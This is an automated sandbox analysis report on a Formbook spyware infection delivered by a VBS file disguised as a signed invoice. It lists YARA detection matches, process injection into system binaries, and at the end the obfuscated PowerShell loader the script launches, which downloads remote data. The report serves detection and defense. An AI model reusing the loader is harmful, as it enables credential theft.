            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144FF095_2_0144FF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01391F925_2_01391F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01382FC85_2_01382FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144FFB15_2_0144FFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01390E595_2_01390E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144EE265_2_0144EE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01399EB05_2_01399EB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144EEDB5_2_0144EEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_013A2E905_2_013A2E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0144CE935_2_0144CE93
            Source: C:\Windows\explorer.exeCode function: 6_2_0B4112326_2_0B411232
            Source: C:\Windows\explorer.exeCode function: 6_2_0B408D026_2_0B408D02
            Source: C:\Windows\explorer.exeCode function: 6_2_0B40E9126_2_0B40E912
            Source: C:\Windows\explorer.exeCode function: 6_2_0B40BB306_2_0B40BB30
            Source: C:\Windows\explorer.exeCode function: 6_2_0B40BB326_2_0B40BB32
            Source: C:\Windows\explorer.exeCode function: 6_2_0B4145CD6_2_0B4145CD
            Source: C:\Windows\explorer.exeCode function: 6_2_0B4100366_2_0B410036
            Source: C:\Windows\explorer.exeCode function: 6_2_0B4070826_2_0B407082
            Source: C:\Windows\explorer.exeCode function: 6_2_0E8E92326_2_0E8E9232
            Source: C:\Windows\explorer.exeCode function: 6_2_0E8E3B326_2_0E8E3B32
            Source: C:\Windows\explorer.exeCode function: 6_2_0E8E3B306_2_0E8E3B30
            Source: C:\Windows\explorer.exeCode function: 6_2_0E8DF0826_2_0E8DF082
            Source: C:\Windows\explorer.exeCode function: 6_2_0E8E80366_2_0E8E8036
            Source: C:\Windows\explorer.exeCode function: 6_2_0E8EC5CD6_2_0E8EC5CD
            Source: C:\Windows\explorer.exeCode function: 6_2_0E8E0D026_2_0E8E0D02
            Source: C:\Windows\explorer.exeCode function: 6_2_0E8E69126_2_0E8E6912
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051205358_2_05120535
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051D75718_2_051D7571
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051E05918_2_051E0591
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051BD5B08_2_051BD5B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051DF43F8_2_051DF43F
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051D24468_2_051D2446
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051114608_2_05111460
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051CE4F68_2_051CE4F6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051447508_2_05144750
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051207708_2_05120770
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051DF7B08_2_051DF7B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0511C7C08_2_0511C7C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051D16CC8_2_051D16CC
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0513C6E08_2_0513C6E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051BA1188_2_051BA118
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051101008_2_05110100
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0510F1728_2_0510F172
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051EB16B8_2_051EB16B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0515516C8_2_0515516C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0512B1B08_2_0512B1B0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051E01AA8_2_051E01AA
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051D81CC8_2_051D81CC
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051CF0CC8_2_051CF0CC
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051270C08_2_051270C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051D70E98_2_051D70E9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051DF0E08_2_051DF0E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051D132D8_2_051D132D
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051DA3528_2_051DA352
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0510D34C8_2_0510D34C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0516739A8_2_0516739A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0512E3F08_2_0512E3F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051E03E68_2_051E03E6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051C02748_2_051C0274
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051252A08_2_051252A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0513B2C08_2_0513B2C0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0513D2F08_2_0513D2F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051C12ED8_2_051C12ED
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0512AD008_2_0512AD00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051D1D5A8_2_051D1D5A
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05123D408_2_05123D40
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051D7D738_2_051D7D73
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05138DBF8_2_05138DBF
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0513FDC08_2_0513FDC0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0511ADE08_2_0511ADE0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05120C008_2_05120C00
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05199C328_2_05199C32
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051C0CB58_2_051C0CB5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05110CF28_2_05110CF2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051DFCF28_2_051DFCF2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051DFF098_2_051DFF09
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05140F308_2_05140F30
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05194F408_2_05194F40
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05121F928_2_05121F92
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051DFFB18_2_051DFFB1
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05112FC88_2_05112FC8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_050E3FD58_2_050E3FD5
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_050E3FD28_2_050E3FD2
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051DEE268_2_051DEE26
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05120E598_2_05120E59
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05132E908_2_05132E90
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051DCE938_2_051DCE93
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05129EB08_2_05129EB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051DEEDB8_2_051DEEDB
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051299508_2_05129950
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0513B9508_2_0513B950
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051369628_2_05136962
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051229A08_2_051229A0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051EA9A68_2_051EA9A6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051228408_2_05122840
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0512A8408_2_0512A840
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051068B88_2_051068B8
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0514E8F08_2_0514E8F0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051238E08_2_051238E0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051DAB408_2_051DAB40
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051DFB768_2_051DFB76
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_050E9B808_2_050E9B80
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0513FB808_2_0513FB80
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051D6BD78_2_051D6BD7
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0515DBF98_2_0515DBF9
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051DFA498_2_051DFA49
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051D7A468_2_051D7A46
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05193A6C8_2_05193A6C
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_0511EA808_2_0511EA80
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_05165AA08_2_05165AA0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051BDAAC8_2_051BDAAC
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_051CDAC68_2_051CDAC6
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4DB1E8_2_02F4DB1E
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4D9EC8_2_02F4D9EC
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4DED48_2_02F4DED4
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F4DE888_2_02F4DE88
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F39E508_2_02F39E50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F32FB08_2_02F32FB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 8_2_02F32D908_2_02F32D90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 013D7E54 appears 88 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0140F290 appears 103 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 0137B970 appears 250 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 013C5130 appears 36 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 013FEA12 appears 86 times
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0518EA12 appears 84 times
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 05167E54 appears 85 times
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0510B970 appears 248 times
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 05155130 appears 36 times
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0519F290 appears 103 times
            Source: Signed Proforma Invoice 3645479_pdf.vbsInitial sample: Strings found which are bigger than 50
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 5.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.2931877788.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000006.00000002.2943761942.000000000B429000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
            Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.2931912709.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000005.00000002.1872655625.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000008.00000002.2931044942.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: Process Memory Space: powershell.exe PID: 6236, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: Process Memory Space: MSBuild.exe PID: 7004, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Process Memory Space: colorcpl.exe PID: 4584, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, TaskParameter.csTask registration methods: 'CreateNewTaskItemFrom'
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, OutOfProcTaskHostNode.csTask registration methods: 'RegisterTaskObject', 'UnregisterPacketHandler', 'RegisterPacketHandler', 'UnregisterTaskObject', 'GetRegisteredTaskObject'
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, TaskLoader.csTask registration methods: 'CreateTask'
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, RegisteredTaskObjectCacheBase.csTask registration methods: 'GetLazyCollectionForLifetime', 'RegisterTaskObject', 'DisposeObjects', 'IsCollectionEmptyOrUncreated', 'UnregisterTaskObject', 'DisposeCacheObjects', 'GetRegisteredTaskObject', 'GetCollectionForLifetime'
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, CommunicationsUtilities.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent(bool)
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.IO.Pipes.PipeSecurity.AddAccessRule(System.IO.Pipes.PipeAccessRule)
            Source: 8.2.colorcpl.exe.32ef150.1.raw.unpack, NodeEndpointOutOfProcBase.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: .configAMSBUILDDIRECTORYDELETERETRYCOUNTCMSBUILDDIRECTORYDELETRETRYTIMEOUT.sln
            Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSBuild MyApp.sln /t:Rebuild /p:Configuration=Release
            Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb
            Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *.sln
            Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSBuild MyApp.csproj /t:Clean
            Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /ignoreprojectextensions:.sln
            Source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSBUILD : error MSB1048: Solution files cannot be debugged directly. Run MSBuild first with an environment variable MSBUILDEMITSOLUTION=1 to create a corresponding ".sln.metaproj" file. Then debug that.
            Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winVBS@17/11@8/6
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\K2No9[1].txtJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2688:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6160:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yuysriqt.cbw.ps1Jump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs"
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: colorcpl.exe, 00000008.00000003.2008152308.0000000003390000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2931288836.0000000003390000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.1895059088.00000000026E5000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.1894768395.000000000287A000.00000004.00000020.00020000.00000000.sdmp, DB1.9.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Signed Proforma Invoice 3645479_pdf.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreD